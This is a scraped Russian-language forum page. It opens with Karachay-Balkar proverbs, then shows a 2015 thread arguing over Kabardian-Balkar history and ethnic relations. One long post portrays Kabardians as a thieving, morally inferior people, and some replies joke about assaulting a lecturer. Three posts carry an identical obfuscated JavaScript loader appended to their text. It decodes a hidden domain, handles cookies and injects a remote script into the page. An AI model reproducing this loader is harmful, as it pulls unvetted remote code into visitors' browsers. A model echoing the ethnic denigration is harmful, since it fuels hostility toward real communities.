Расширенный поиск
18 Мая  2024 года
Логин: Регистрация
Пароль: Забыли пароль?
  • Окъуусуз билим – джокъ, билимсиз кюнюнг – джокъ.
  • Аманны эки битли тону болур, бирин сеннге кийдирир, бирин кеси киер.
  • Азыкълы ат арымаз, къатыны аман джарымаз.
  • Атлыны ашхысы, ат тизгининден билинир
  • Баш – акъыл ючюн, акъылман – халкъ ючюн.
  • Гитче джилтин уллу элни джандырыр.
  • Къонагъынгы артмагъын алма да, алгъышын ал.
  • Ач келгенни – тойдур, кеч келгенни – къондур.
  • Аманны тукъумуна къарама, игини тукъумун сорма.
  • Биреуню къыйынлыгъы бла кесинге джол ишлеме.
  • Джиби бир къат джетмей эди да, эки къат тарта эди.
  • Магъанасыз сёз – тауушсуз сыбызгъы.
  • Эркишиге тары кебек танг кёрюнюр.
  • Дууулдаса – бал чибин, къонса – къара чибин.
  • Кёб джашагъан – кёб билир.
  • Чакъырылмай келген къонакъ сыйланмай кетер.
  • Босагъагъа джууукъ орун болса, ашыгъыб тёрге озма.
  • Сабийни джумушха джибер да, ызындан бар.
  • Дженгил джетерикме деб, узун джолну къоюб, къысхасын барма.
  • Чакъырылмагъан джерге барма, чакъырылгъан джерден къалма.
  • Джырчы ёлсе, джыры къалыр.
  • Джангыз терек къынгыр ёсер.
  • Уллу сёлешме да, уллу къаб.
  • Ётюрюкню башын керти кесер.
  • Адам къаллай бир ишленмесе, аллай бир кесин уллу кёреди.
  • Иги джашны ышаны – аз сёлешиб, кёб тынгылар.
  • Сёз садакъдан кючлюдю.
  • Атынг аманнга чыкъгъандан эсе, джанынг тамагъынгдан чыкъсын.
  • Тенгинг джокъ эсе – изле, бар эсе – сакъла!
  • Ашхы болсанг, атынг чыгъар, аман болсанг, джанынг чыгъар.
  • Ётюрюкню къуйругъу – бир тутум.
  • Эки къатын алгъан – эки ташны ортасына башын салгъан.
  • Термилгенинги табмазса, кюлгенинге тюберсе.
  • Джолунга кёре – джюрюшюнг, джагъанга кёре – юлюшюнг.
  • Ойнаб айтсанг да, эслеб айт.
  • Сабийликде юретмесенг, уллу болса – тюзелмез.
  • Бермеген къол, алмайды.
  • Ёзденликни кёбю ётюрюк.
  • Эм уллу байлыкъ – джан саулукъ.
  • Джауумдан сора, кюн кюйдюрюр, ётюрюкден сора, айыб кюйдюрюр.
  • Кёлсюзден сёзсюз тууар.
  • Тай асырагъан, атха минер.
  • Ишлемеген – тишлемез.
  • Айтхан сёзюне табылгъан.
  • Ушамагъан – джукъмаз.
  • Байны къызы баймакъ болса да, юйде къалмаз!
  • Кёлю джокъну – джолу джокъ.
  • Юйюнгден чыкъдынг – кюнюнгден чыкъдынг.
  • Игилик игилик бла сингдирилиучю затды.
  • Эли джокъну – кёлю джокъ.
Страницы: Пред. 1 ... 105 106 107 108 109 ... 112 След.
НОВОСТИ (Общественно-политическая ситуация в КЧР, КБР)
 
Цитата
сосед пишет:
Я понимаю от чего все эти комплексы. Но разве мы виноваты, что нас больше, что в малой Кабарде чума унесла больше людей, чем в большой, оттого осетины и ингуши смогли выйти на плоскость, а вы остались запертыми и окружёнными кабардинцами без каких либо геополитических перспектив? Или заявляй, что мы гости на своей земле в открытую или вообще не намекай.
Ну вот наконец и проявился вирус))) :браво: уважаемый сосед, во-первых, поменяй свой ник, так-как для многих слово сосед ассоциируется словом добрососедство, к которому ты никакого отношения не имеешь;
во-вторых, если тебя охмурили ваши новоявленные историки не думай что и нас тоже, им бы фельетоны писать для журнала крокодил, некоторые учебники по которым вы учились уже получили статус макулатуры...
Видит Бог я не хотел ворошить грязное прошлое, вообще-то думал что тема уже выдохлась, да и надоело все время одно и тоже мусолить, но ты такой забавный что не оставил мне другого выбора, поэтому получи маленький ликбез.


КАБАРДИНЦЫ ОСКОРБЛЯЮТ ВСЕ НАРОДЫ СЕВЕРНОГО КАВКАЗА.

О том, что кабардинцы постоянно клевещут на Россию знают все. Но о том, что они постоянно оскорбляют народы Северного Кавказа знают не все. Кабардинцы в 2006 году выпустили 1247 страничную «Адыгскую (черкесскую) энциклопедию». Главный смысл этой книги кабардинцы высшая раса, а все остальные народы низшие расы и не справедливо, что они не имеют своего государства. Но нас особо интересует раздел «Адыги и народы Северного Кавказа», который состоит из 31 страниц (373-404), где пестрят такие высказывания: «значительная часть северокавказских народов в силу экономической зависимости от плоскостного населения (кабардинцев) очень рано оказались под его влиянием», «довольно рано под политическое господство Кабарды попали горцы Центрального Кавказа», «в 60-70 гг. 18 века кабардинские владельцы не раз применяли военную силу для подчинение осетин и особенно ингушей, отказавшихся платить подати», «Этикет кабардинский приобрел особое звучание и стал на Кавказе синонимом аристократической изысканности и камильфотности», «кабардинский субвариант адыгской культуры, дал ему мощную силу для воздействия на культурогенез других народов Северного Кавказа» и т.д. Наверное другие народы Северного Кавказа ответят лучше и больше на эти оскорбления чем мы. Но мы дадим свои ответы. Балкарцы никогда не были зависимыми, от кабардинцев и никогда не завидовали культуре кабардинцев. Наоборот, всегда писали и говорили о них, что нравственность у балкарцев выше, чем у кабардинцев. Это подтверждают сами предки кабардинцев. Кудашев писал: «С кабардинцами жителям балкарского общества приходились вести долгую и упорную борьбу. Только благодаря природным условиям и единодушию среды балкарцев им удалось сохранить свою независимость и самостоятельность». В 1743 году Могомет Атажукин, Адильгерий Гелясханов и кумыкский владелец Алиш Хамзин сообщили в коллегию иностранных дел о карачаево-балкарцев и осетин: «Оные горские народы ни у которого государя не в подданстве и никому ими овладеет невозможно, за тем, что живут в крепких и непроходимых местах». Известный балкарец Мусос Абаев в очерке «Балкария» приводит два случая столкновения кабардинских князей с балкарскими таубиями. Верховный князь Малой Кабарды Кайтукин в противостоянии с таубием Абаевым убедился, что силой Абаева не победить и вынужден был искать с ним соглашение. Верховный князь Большой Кабарды Атажукин с большим отрядом поехал подчинить себе таубия Орусбиева и потерпел жестокое поражение и сам чудом спася. Известный юрист в России Басият Шаханов писал: «Кабардинские князья часто пытались привести крымских сборщиков дани в Балкарию. Но это всегда для них заканчивались плачевно. Только с одной винтовкой под называнием «гитче шкок» было убито 12 кабардинских князей. Эта винтовка хранится у Хамзата Орусбиева. Как могли подчиниться народы Северного Кавказа кабардинцам, тогда как их самих били все кому не лень. Их били крымцы, кумыки, калмыки, ногайцы, чеченцы и казаки. Кабардинцы постоянно обращались к русским царям с просьбой «обороните нас от шефкала», «защитите от крымского царя», «обороните нас от ногаев и калмыков», «обороните от горских татар». В мае 1722 году Кайтукин писал Петру первому: «Однако татарские народы нас зело теснят и обижают, от чего в разорение пришли». Сами кабардинцы крымскому хану платили дань людьми. Этого никто не делал кроме кабардинцев.

Теперь о кабардинской аристократической изысканности. В1721 г. Астраханский губернатор А. Волынский пораженный жизни кабардинцев, писал Петру первому: «Между ними вовеки миру не бывает, ибо государь, житье их самое зверское и не токмо постороннее, но и родных друг друга за безделицу режут». В 1839 г. Корреспондент «Таимс» Дж.А. Лолгворт писал: «Эти мелкие сюзерены происходят, как кажется, из Кабарды принесли свое оружие во все уголки Черкесии. Их цель могло быть что угодно, кроме установление там порядка и спокойствие. Скорее всего именно им обязан Кавказ своей дурной репутацией». Так кабардинцы всегда позорили весь Кавказ. Кудашев писал: «Борьба отдельных племен адыгского народа ожесточила их друг против друга, развивала хищнические наклонности, и отразилось на образе жизни, их нравах и обычаев».

Теперь о «Адыгэ хабзэ», как усиленно навязывают жителям Кабардиро-Балкарии. Адыгэ хабзэ - разрешало торговать с людьми, Адыгэ хабзэ - разрешало платить дань людьми, от Адыгэ хабзэ - убегали простые кабардинцы и принимали другую религию,

Адыгэ хабзэ - одобряло рабство. Из 25 тыс. крепостных в Терской области 21тыс. - были кабардинцами.

Адыгэ хабзэ – разрешало братоубийство.

В 1784 году генерал Р.А.Фадеев создал из кабардинцев милицию для борьбы с западными адыгами. Они были на много жестокими чем русские солдаты. Фадеев писал: «Тем временем летучий отряд, составленный из кабардинцев, обыскал горы и там нашел много селений, забившихся между недоступными крутизнами. Пока громили абедзехов, два отряда, настойчиво продолжали действия против шапсугов».

Морень Вагнер писал: «Торговля с черкесскими девушками производиться все еще в том объеме, но требует теперь осторожности».

Очень важно знать, что говорили в России известные люди.

Известный историк и этнолог Евгений Марков писал: «Кабарда это первый вор на всем свете. Кабарда присоединилась к России уже с1732 года, а между тем принадлежит к числу самых распушенных и безнравственных племен Кавказа. В Кабардинской плоскости крепостничество и рабство были гораздо более чем в горном Кавказе, т.е. в ущельях Балкарской, Уруспийской и др. Кабардинские князья и уздены до такой степени пали нравственно под влиянием рабство, что всякий труд у них считается позором. Жители почти бесплодных скал Балкарского, Безингиевского, Чегемского и Уруспийского ущелий живут гораздо зажиточнее и спокойнее настоящих кабардинцев равнины. Вместе с тем поля какого-нибудь балкарца обработаны с тщательностью и трудолюбием европейца.» Тоже самое писал о балкарцах Н.Ф. Грабовский в 1869 году. Но одно предложение стоит привести. «И так взяв во внимание наклонность горцев к труду, довольно весьма в тяжелых условиях рабства, их положительное и нравственное превосходство в сравнении с их соседями кабардинцами, всякий легко согласиться».

А вот какую оценку дал балкарцам Н.П.Тульчинский в 1903 году: «Можно с уверенности сказать, что из всех народностей Терской области и пожалуй всего Кавказа, население пяти Горских обществ Балкарии является самым нравственным, честнейшим, тихим, трудолюбымым племенном.»

А какие оценки давали кабардинцам русские руководители? Кудашев писал: «Главный пристав Кабарды генерал Дельпоццо писал: « Многократное вероломству кабардинцев российскому престолу и в то же время приверженность то к турецкому, то к персидскому двору. Народ мне довольно известный по своим льстивым, хитрым, вероломным, коварным поступкам».

Еще интереснее. Когда Потемкин по просьбе кабардинцев обратился к Екатерине – II, с предложением оставить им степи она ответила: «Эти люди великой лживости, лицемерия и лести, а на деле воровское, грабительское племя, боящееся одной силы».

Теперь сравним кабардинцев с другими народами Северного Кавказа. Кроме кабардинцев все являются кавказцами, кроме кабардинцев все имел свою этническую территорию, кроме кабардинцев никто не платил дань с людьми, все народы вошли в России поданными, а кабардинцы вошли холопами, кабардинцы постоянно нарушали свою присягу России, никто этого не делал кроме кабардинцев, все народы считают позором присваивать чужие достижение, а для кабардинцев это успех и т. д.


Цитата
шагди пишет:
Живи мирно, если с тобой не воюют.
Вот и второй...))...)
Ну что шагди, я пойду на все уступки только не воюй со мной.))

Интересно :думаю: не хотите ли вы сами себя забанить, если вы пришли с войной от нас пряников не ждите...
Изменено: Сахадин - 27.10.2015 03:07:49
 
Цитата

Сахадин пишет:
если вы пришли с войной от нас пряников не ждите...

Тебе по русски дали понять, что нужно ценить мир между нами. Да и зачем воевать. У нас больше объединяющего, чем разъединяющего. И скажу тебе по секрету, если вдруг что, нам и не прийдётся воевать. Как сказал как то мой друг балкарец, мы с гор будем вас мочить, и не запустим в ущелья. У нас выгодная позиция. (Естественно всё в шутку). Я ему ответил - а зачем нам заходить куда то? Закроем дороги и всё. Поэтому Сахадин, не провоцируй конфликты своими грязными статейками аля ССБН. Их звук тук тук.
 
Цитата
шагди пишет:
Поселения майкопцев встречается и в горах центрального Кавказа, большинство в местах путей перехода через хребет. То есть Осетия, Ингушетия и Чечня. Почитайте любых ученых, при желании могу скинуть авторов научных изданий. Влияние этой культуры на другие доходит до современного Дербента на востоке и реки Дон на севере. А по поводу антропологического типа населения, то хоть исследований было сделано мало. но они говорят о том, что жители Майкопской культуры "средиземноморцы" , как и жители Месопотамии и средней Анатолии, откуды мы и берем свое начало(по крайней мере так говорят ученые). То, что антропологический тип данной культуры был не однороден это не новость. Это ведь культура, а не народ. Так же, наша с вами кавказская культура... Танцы, обычаи, одежда, музыка и т.д. очень схожи.... но черепушки разные)). И да, Кобанская культура была моложе Майкопской на 2 тыс. лет. Майкопская культура пошла с Северо-западного Кавказа на восток. Кобанская с Южного Кавказа (Колхида) на север.
шагди, если с Кобанской культурой всё понятно, а именно то что её наследники это Кавкасионы Кавказа ( Чеченцы, Ингуши, Карачаевцы, Балкарцы, Осетины ) , то понятие "средиземноморцы" очень растяжимое, и к ним относится великое множество народов и нет прямого указания на то что наследниками майкопской культуры являетесь именно вы, а не какой то другой народ (народы) средиземноморской расы (турки, арабы, персы, евреи, греки, берберы, индийцы, афганцы, и т.д).
Во вторых, кобанская культура, это не начало появления кавкасионов на СК, это только один из периодов их развития. Кавкасионы не пришли откуда то, а формировались именно здесь в условиях высокогорья несколько тысячелетий назад.


А в целом эти разговоры о расах и культурах лучше вести в историческом ключе, без привязки к современной политике.
 
Цитата
Месси пишет:
И на Кавказе, и в мире, и так знают кто кем был, и кто из себя что представлял и представляет.
Месси, как вы собираетесь устанавливать добрососедские отношения, будучи преисполнены чувства национального превосходства?

Я много путешествую по странам мира и поверьте мне миру нет никакого дела ни до вас ни до нас. Никто не знает ни о вашем ни о нашем существовании.
Максимум на что могут рассчитывать такие малочисленные народы как мы с вами, это быть орудием и разменной монетой в чужой геополитике.
Поэтому давайте быть мудрее. Надо извлекать уроки из трагического прошлого наших народов.
 
БЕЗ КОММЕНТАРИЕВ

В Японии, в одной из газет была опубликована одна старая легенда об официальном (быть может не единственном) случае столкновения черкесов ("черных демонов"- как их называли японцы после того случая), с войнами-самураями. Говорят, перед боем предводитель самураев произнес следующие слова: "Мы самураи - воины востока, это наша земля,мы погибнем за нее, и мы ищем славную смерть на поле брани." В ответ предводитель черкесов мягко ответил: "Мы Черкесы, пришли с запада,и мы дадим тебе то, что ты искал...." После боя самураи скажут "Это были великие войны. Они сражались так, как будто нас было 50 человек, а их 400, хотя все было ровно наоборот." В живых осталось лишь 127 самураев.

Масахиса Ябумото,японский журналист.
 
Одноклассники. Группа "Адыги мира". Около двух сотен классов.
 
Цитата

Хаджимурат пишет:
БЕЗ КОММЕНТАРИЕВ

В Японии, в одной из газет была опубликована одна старая легенда об официальном (быть может не единственном) случае столкновения черкесов ("черных демонов"- как их называли японцы после того случая), с войнами-самураями. Говорят, перед боем предводитель самураев произнес следующие слова: "Мы самураи - воины востока, это наша земля,мы погибнем за нее, и мы ищем славную смерть на поле брани." В ответ предводитель черкесов мягко ответил: "Мы Черкесы, пришли с запада,и мы дадим тебе то, что ты искал...." После боя самураи скажут "Это были великие войны. Они сражались так, как будто нас было 50 человек, а их 400, хотя все было ровно наоборот." В живых осталось лишь 127 самураев.

Масахиса Ябумото,японский журналист.

Ниче так хапар)
Si vis pacem, para bellum
 
Цитата
Patek Philippe пишет:
то понятие "средиземноморцы" очень растяжимое, и к ним относится великое множество народов и нет прямого указания на то что наследниками майкопской культуры являетесь именно вы, а не какой то другой народ (народы)средиземноморской расы (турки, арабы, персы, евреи, греки, берберы, индийцы, афганцы,и т.д).
Зачем искать в "майкопцах" кого то, кто жил и живет далеко от Кавказа. Абхазо-адыги, часть грузин и часть греков, это те понтийцы, кто населял территорию Майкопской культуры, а адыги населяют до сих пор и живут в тех районах Кавказа, где больше всего следов майкопцев. А так, дальнейшие исследования дадут понять что да как.window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="18908",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("elbrusoid.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Цитата
Patek Philippe пишет:
Во вторых, кобанская культура, это не начало появления кавкасионов на СК, это только один из периодов их развития. Кавкасионы не пришли откуда то, а формировались именно здесь в условиях высокогорья несколько тысячелетий назад.
Возможно. Это относится и к Майкопской и к другим культурам. Зарождение Кобанской культуры на Кавказе было на его южных склонах. В то время когда на его северной части преобладало и во всю развивалось население Майкопской культуры.
Цитата
Patek Philippe пишет:
как вы собираетесь устанавливать добрососедские отношения, будучи преисполнены чувства национального превосходства?

Приведи мне хоть одно сообщение тут, где адыги ставили себя выше кого либо?! С вашей стороны есть такие факты.
Это только твое субъективное мнение. Адыгам не нужны конфликты.
 
https://cdn.fbsbx.com/hphotos-xap1/v/t59.2708-21/11737637_1445785429079333_793697823_n.doc/%D0%A4%D0%B0%D0%BB%D1%8C%D1%81%D0%B8%D1%84%D0%B8%D0%BA%D0%B0%D1%82%D0%BE%D1%80%D1%8B-%D0%B8%D1%81%D1%82%D0%BE%D1%80%D0%B8%D0%B9.doc?oh=60222fa18005fb02f6eb8d79d575d55f&oe=5632EF32&dl=1
Изменено: Sagid - 28.10.2015 16:06:06
 
шагди,
А сам можешь привести факт того, что здесь кто-то выше себя ставит?
Себе в голове чето внушил и поверил в это.
 
Фальсификаторы историй.doc М. БУДАЙ
Изменено: Sagid - 28.10.2015 16:34:58
 
Шагди, а мне по барабану на то, что ты здесь пишешь. Если есть чем опровергнуть Будая, выкладывай и потом поговорим.
 
Цитата
Sagid пишет:
Фальсификаторы историй.doc М. БУДАЙ
Цитата
Маг пишет:
Шагди, а мне по барабану на то, что ты здесь пишешь. Если есть чем опровергнуть Будая, выкладывай и потом поговорим.

Ну вот, что и следовало доказать :lol: :lol: :lol:
 
Месси,
Что и кому следовало доказывать? Вы здесь чего доказательства ищите?
Если считать националистов в среде народов, то вы в этом далеко впереди!
 
Нет, merah, они пытаются перевести разговор в здравое русло.
 
Цитата
Borzbash пишет:
шагди,
А сам можешь привести факт того, что здесь кто-то выше себя ставит?
Себе в голове чето внушил и поверил в это.
Ты ставишь балкарцев выше кабардинцев. Сам ведь сказал. что мы вам качественно уступаем). Так что, надо и в своем глазу бревно видеть.window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="18908",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("elbrusoid.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
Цитата
merah пишет:
Месси,
Что и кому следовало доказывать? Вы здесь чего доказательства ищите?
Если считать националистов в среде народов, то вы в этом далеко впереди!
Адыги перекрывали балкарцам с флагами проезд по нас. пункту (кабардинцы приглашали на этот конный проход и балкарцев, вы отказались), кабардинцы оскорбляли балкарский флаг? Хоть какого то балкарца оскорбили за адыгским столом (история из жизни), кабардинки создают группы в вк, что бы очернять балкарок? Кабардинцы заявляли о том, что нужно выселять балкарцев из тамакъла (квартал Н.Жемталы)? А вот балкарское меньшенство заявило во главе с покойным Жамалом, фамилию не буду называть, и гуэныхь Аллыхьым къыхуигъэгъу. Его быстренько успокояли свои же старики. Если мы такие националисты, зачем тогда вы селитесь в наши нас. пункты? А сами боитесь наплыв кабардинцев в горы (ситуация с приданием п.Эльбрус статуса города). Может быть у нас националистов и больше, но это потому, что нас в несколько раз больше. Прошлым летом в одной из адыгских групп сделал опрос, "адыги, как вы относитесь к нашим соседям карачаево-балкарцем", где то 50% ответило, что дружелюбно, 15% - как к братьям по духу и по вере, еще 15% - как они ко мне, так и я к ним, оставшиеся 20% ответили, что отрицательно, они враги адыгского народа. Это примерно 30 человек так ответило, из них за адыгов так ответило 18 карачаево-балкарцев. Видимо думали, что опрос анонимный. Примеров уйма. В файлообменнике спейсис, на кумыкском форуме, ингушском.... представители вашего народа с удовольствием вешали на нас ярлыки обрусевших, не знающих уже собственного языка, разводящих свиней и т.д. В спэйсис один балкарец выложил фото девушки и парня кавказской внешности...хьабыршыбыр короче говоря, занимаются харамом. Язык непонятный. Он подписал, что это как кабардинка... там с ним спорит один аварец, что это цумадинка... а этот стоит на своем)). Таких видео 10-15. Что это такое уважаемый merah? Разве это нормально?window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="18908",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("elbrusoid.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
шагди,
Я это малодушие не понимаю, но рассматриваю как реакцию на политику респ властей!
Ведь вы же должны были понимать, что нац политика, прводимая предыдущим главой в сути своей являвшегоося нациком даст свои плоды.вот они!
 
Шагди пишет - Адыги перекрывали балкарцам с флагами проезд по нас. пункту (кабардинцы приглашали на этот конный проход и балкарцев, вы отказались), кабардинцы оскорбляли балкарский флаг?

Балкарцы не перекрывали кабардинцам проезд по населенным пунктам. Все ездиют куда хотят и когда хотят. Если ты имеешь в виду попытку проехать через Кенделен группы кабардинцев на къанжол, то следует отметить, что данная поездка преследовала совсем другую цель, т.е. установление памятника (кинжала) на месте, где, якобы произошла битва с крымцами. Никакого уведомления в администрацию села от группы не поступало и какого ли приглашения к балкарцам о принятии участия в данной поездке не поступало. Об участии начали говорить только тогда, когда с кабардинскими старейшинами вели переговоры возле Кенделена. Это не является оскорблением кабардинского флага. А вот со стороны кабардинцев, которые организовали данный поход, имеет место наплевательского отношения к субъектообразующему балкарскому народу.

Шагди пишет - Хоть какого то балкарца оскорбили за адыгским столом (история из жизни)
А ты во всех адыгских застольях присутствуешь? А, что оскорбляют только за столом? Например, академика Залиханова М.Ч. оскорбили публично на митинге в Нальчике. Или, оскорбление должно иметь место только за столом? Если преподаватель КБГУ Калмыков не ставит балкарцам зачет, только за то, что они балкарцы, это что, не оскорбление? Если перед тем как начать лекцию, преподаватель Мамбетов спрашивал есть ли в аудитории балкарцы, и убедившись, что нет балкарцев поливал грязью, это не оскорбление? Сам не слышал про Мамбетова, от знакомых кабардинцев. Таких примеров полно Шагди.

Шагди пишет - Кабардинцы заявляли о том, что нужно выселять балкарцев из тамакъла (квартал Н.Жемталы)?

По поводу Н.Жемталы не слышал, но призывы выселить балкарцев из Чегема, с Нальчика, Кенже были. Да и не только были призывы о выселении. Например, преподаватель КБГУ Шанибов Ю., во время лекции в аудитории КБГУ открыто угрожал балкарцам войной и полным уничтожением.
 
Цитата
Маг пишет:
балкарцам войной и полным уничтожением.
Ишь ты какой удалой))
Si vis pacem, para bellum
 
Цитата
Маг пишет:
преподаватель КБГУ Шанибов Ю., во время лекции в аудитории КБГУ открыто угрожал балкарцам войной и полным уничтожением.
Ему самому надо было тёмную устроить)))))
Самое тихое и безмятежное место, куда человек может удалиться, — это его душа... Почаще же разрешай себе такое уединение и черпай в нем новые силы.
 
Цитата

Мёлек пишет:
ЦитатаМаг пишет:
преподаватель КБГУ Шанибов Ю., во время лекции в аудитории КБГУ открыто угрожал балкарцам войной и полным уничтожением.
Ему самому надо было тёмную устроить)))))

Пусть палицаи разбераются в этом
Si vis pacem, para bellum
 
Цитата
legenda пишет:
Цитата

Мёлек пишет:
ЦитатаМаг пишет:
преподаватель КБГУ Шанибов Ю., во время лекции в аудитории КБГУ открыто угрожал балкарцам войной и полным уничтожением.
Ему самому надо было тёмную устроить)))))

Пусть палицаи разбераются в этом
ну значитпо судам потащить надо его...чтоб мало не показалсь
Самое тихое и безмятежное место, куда человек может удалиться, — это его душа... Почаще же разрешай себе такое уединение и черпай в нем новые силы.
 
Цитата

Мёлек пишет:
Цитатаlegenda пишет:
Цитата
Мёлек пишет:
ЦитатаМаг пишет:
преподаватель КБГУ Шанибов Ю., во время лекции в аудитории КБГУ открыто угрожал балкарцам войной и полным уничтожением.
Ему самому надо было тёмную устроить)))))

Пусть палицаи разбераются в этом
ну значитпо судам потащить надо его...чтоб мало не показалсь

венгриядан хапар бир айт?ариумуду анда?
Si vis pacem, para bellum
 
Цитата
legenda пишет:
венгриядан хапар бир айт?ариумуду анда?
Хлеб у них вкусный был))))))))Больше ничего не помню)))Это давно было...лет 20 прошло))))))
Самое тихое и безмятежное место, куда человек может удалиться, — это его душа... Почаще же разрешай себе такое уединение и черпай в нем новые силы.
 
Цитата

Хаджимурат пишет:
БЕЗ КОММЕНТАРИЕВ

В Японии, в одной из газет была опубликована одна старая легенда об официальном (быть может не единственном) случае столкновения черкесов ("черных демонов"- как их называли японцы после того случая), с войнами-самураями. Говорят, перед боем предводитель самураев произнес следующие слова: "Мы самураи - воины востока, это наша земля,мы погибнем за нее, и мы ищем славную смерть на поле брани." В ответ предводитель черкесов мягко ответил: "Мы Черкесы, пришли с запада,и мы дадим тебе то, что ты искал...." После боя самураи скажут "Это были великие войны. Они сражались так, как будто нас было 50 человек, а их 400, хотя все было ровно наоборот." В живых осталось лишь 127 самураев.

Масахиса Ябумото,японский журналист.


Почему не 47 самураев?)
 
Цитата
Мёлек пишет:
Цитата
legenda пишет:
